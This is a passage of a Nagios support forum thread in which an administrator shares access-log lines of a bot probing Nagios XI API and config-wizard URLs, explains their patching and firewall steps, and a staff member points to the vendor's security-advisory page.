185.183.84.197 - - [20/Jan/2021:11:17:21 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:20 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:20 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:21 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:20 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:18 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:21 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:24 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:24 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:26 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:24 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:28 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:26 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:26 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:28 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:23 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:23 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:28 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:24 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:29 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:32 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:29 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:30 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:39 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:39 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:26 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:26 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:39 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:26 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:34 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:39 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:25 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:39 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:34 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:32 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:32 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:34 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:59 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:59 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:39 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
I have many many more logged attempts, but they're all calling basically the same URL's.

I don't know exactly what they're attempting to do and have no evidence of a vulnerability actually being exploited in my particular case, but the calls to XI-specific URL's has me concerned that there is something very specific they're looking for, likely an an old version of XI?

I have verified I am running the latest XI release (I basically always am on latest), and I also ran updates for the components/config wizards (I think these all got updated at 5.8.0 anyway).
I have also implemented some additional firewall rules, but I wanted Nagios staff to be aware that this is happening in case they weren't, and maybe remind people that you should keep your stuff updated at all times, especially if it's publicly reachable.

Re: XI being targeted by exploit bots

Posted: Fri Jan 29, 2021 3:45 pm
by dchurch
Also keep in mind that Nagios does maintain a list of known security vulnerabilities in our products here: https://www.nagios.com/products/security/

If we find something, we'll put it there along with remediation steps.
All times are UTC-05:00
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited